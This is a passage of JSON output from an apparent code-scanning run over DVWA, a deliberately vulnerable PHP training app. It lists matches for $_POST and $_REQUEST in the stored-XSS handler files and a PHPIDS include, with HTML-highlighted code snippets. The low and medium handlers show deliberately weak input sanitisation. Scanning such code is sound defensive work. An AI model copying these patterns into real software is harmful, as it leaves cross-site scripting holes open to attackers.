  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'btnSign'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">8:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'mtxMessage'</span> <span class=\"token punctuation\">]</span> <span 
class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$name</span>    <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'txtName'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitize message input\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span 
class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 8,
  "start": 3,
  "end": 14,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 300,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'mtxMessage'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t<span class=\"token variable\">$name</span>    <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'txtName'</span> <span class=\"token 
punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitize message input\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span 
class=\"token punctuation\">,</span>  <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">htmlspecialchars</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 9,
  "start": 4,
  "end": 15,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 304,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/low.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'btnSign'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'mtxMessage'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$name</span>    <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'txtName'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitize message input",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 305,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/low.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'btnSign'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'mtxMessage'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$name</span>    <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'txtName'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitize message input\n<span 
class=\"line-number\">9:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token 
punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 306,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/low.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'btnSign'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'mtxMessage'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">6:</span> \t<span class=\"token variable\">$name</span>    <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'txtName'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitize message input\n<span 
class=\"line-number\">9:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token 
punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> ",
  "line": 6,
  "start": 1,
  "end": 12,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 308,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'btnSign'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'mtxMessage'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$name</span>    <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'txtName'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitize message input",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 309,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'btnSign'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'mtxMessage'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$name</span>    <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'txtName'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitize message input\n<span 
class=\"line-number\">9:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">strip_tags</span><span class=\"token punctuation\">(</span> <span class=\"token function\">addslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token 
punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 310,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'btnSign'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'mtxMessage'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">6:</span> \t<span class=\"token variable\">$name</span>    <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'txtName'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitize message input\n<span 
class=\"line-number\">9:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">strip_tags</span><span class=\"token punctuation\">(</span> <span class=\"token function\">addslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token 
punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">htmlspecialchars</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 6,
  "start": 1,
  "end": 12,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 30,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPhpIds.inc.php",
  "filetype": "php",
  "search": "\\s\\$_REQUEST",
  "match": "<span class=\"line-number\">57:</span> \t\t<span class=\"token operator\">*</span> <span class=\"token number\">1</span><span class=\"token punctuation\">.</span> Define what <span class=\"token keyword\">to</span> scan\n<span class=\"line-number\">58:</span> \t\t<span class=\"token operator\">*</span> Please keep <span class=\"token keyword\">in</span> mind what array_merge does <span class=\"token operator\">and</span> how this might interfer\n<span class=\"line-number\">59:</span> \t\t<span class=\"token operator\">*</span> <span class=\"token keyword\">with</span> your variables_order settings\n<span class=\"line-number\">60:</span> \t\t<span class=\"token operator\">*</span><span class=\"token operator\">/</span>\n<span class=\"line-number\">61:</span> \t\t<span class=\"token variable\">$request</span> <span class=\"token operator\">=</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span>\n<span class=\"highlight\"><span class=\"line-number\">62:</span> \t\t\t<span class=\"token string\">'REQUEST'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">,</span></span>\n<span class=\"line-number\">63:</span> \t\t\t<span class=\"token string\">'GET'</span>     <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">64:</span> \t\t\t<span class=\"token string\">'POST'</span>    <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">,</span>\n<span 